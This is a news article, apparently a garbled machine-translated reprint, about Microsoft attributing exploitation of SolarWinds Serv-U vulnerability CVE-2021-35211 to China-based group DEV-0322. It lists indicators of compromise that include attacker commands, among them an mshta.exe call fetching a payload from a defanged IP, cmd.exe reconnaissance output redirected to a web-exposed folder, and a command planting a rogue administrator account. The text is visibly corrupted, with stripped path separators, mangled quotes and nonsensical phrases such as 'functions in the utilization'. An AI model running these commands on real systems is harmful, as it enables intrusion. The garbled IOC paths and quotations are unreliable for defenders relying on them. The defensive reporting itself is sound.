Microsoft said on Tuesday that hackers operating in China exploited a zero-day vulnerability in a SolarWinds product. According to Microsoft, the hackers were in all likelihood targeted at software companies and the US defense industry.
SolarWinds revealed the zero-day on Monday, after receiving a message from Microsoft that they had discovered that a previously unknown vulnerability in SolarWinds Serv-U product line was under active exploitation. Austin, Texas-based SolarWinds gave no details about the threat behind the attacks or how their attack worked.
Commercial VPNs and compromised consumer routers
On Tuesday, Microsoft said it currently describes the hacking group as “DEV-0322.”
“MSTIC has observed DEV-0322 targeting US Defense Industrial Base Sector devices and software companies,” researchers from the Microsoft Threat Intelligence Center wrote in a post. “This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in the attacker infrastructure.”
In addition to the three attacker-related servers already revealed by SolarWinds, Microsoft provided three additional indicators that people can use to determine if they were hacked. The compromise indicators are:
- hxxp: // 144[.]34[.]179[.]162 / a
- C: Windows Temp Serv-U.bat
- C: Windows Temp test current.dmp
- The presence of suspicious exception errors, especially in the DebugSocketlog.txt log file
- C: Windows System32 mshta.exe http: // 144[.]34[.]179[.]162 / a (defended)
- cmd.exe / c whoami> “./Client/Common/redacted.txt”
- cmd.exe / c dir> “. Client Common redacted.txt ”
- cmd.exe / c “C: Windows Temp Serv-U.bat”
- powershell.exe C: Windows Temp Serv-U.bat
- cmd.exe / c type \ redacted redacted.Archive> “C: ProgramData RhinoSoft Serv-U Users Global Users redacted.Archive”
Tuesday’s post also provided new technical details about the attack. Specifically:
We observed that DEV-0322 redirected the output of their cmd.exe commands to files in the Serv-U Client Common folder, which is accessible from the Internet by default, so that attackers could retrieve the results of the commands. The actor was also found to add a new global user to Serv-U, and effectively add himself as a Serv-U administrator, by manually creating a designed .Archive file in the Global Users directory. Serv-U user information is stored in these archive files.
Due to the way DEV-0322 had written its code, when exploitation compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process can also crash after a malicious command was executed.
By reviewing telemetry, we identified functions in the utilization, but not a causal vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, which performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. When a cause was found, we reported the vulnerability of SolarWinds, which responded quickly to understand the issue and build an update.
The zero-day vulnerability, which is tracked as CVE-2021-35211, lies in SolarWinds’ Serv-U product, which customers use to transfer files across networks. When Serv-U SSH is exposed to the Internet, exploits allow attackers to run malicious code remotely with high system privileges. From there, attackers can install and run malicious payloads, or they can view and modify data.
SolarWinds became a household name overnight in late December when researchers discovered that it was at the center of an attack in the global reach supply chain. After compromising SolarWinds’ software building system, the attackers used their access to force a malicious update to approximately 18,000 customers of the company’s Orion network management tool.
Of these 18,000 customers, about nine of them in the US government agencies and about 100 of them in the private industry received subsequent malware. The federal government has blamed the attacks on Russia’s foreign intelligence service, which is abbreviated SVR. For more than a decade, SVR has been conducting malicious campaigns targeting governments, political think tanks and other organizations around the world.
The zero-day attacks that Microsoft discovered and reported have nothing to do with the Orion supply chain attack.
SolarWinds patched the vulnerability this weekend. Anyone running a vulnerable version of Serv-U should update immediately and look for signs of compromise.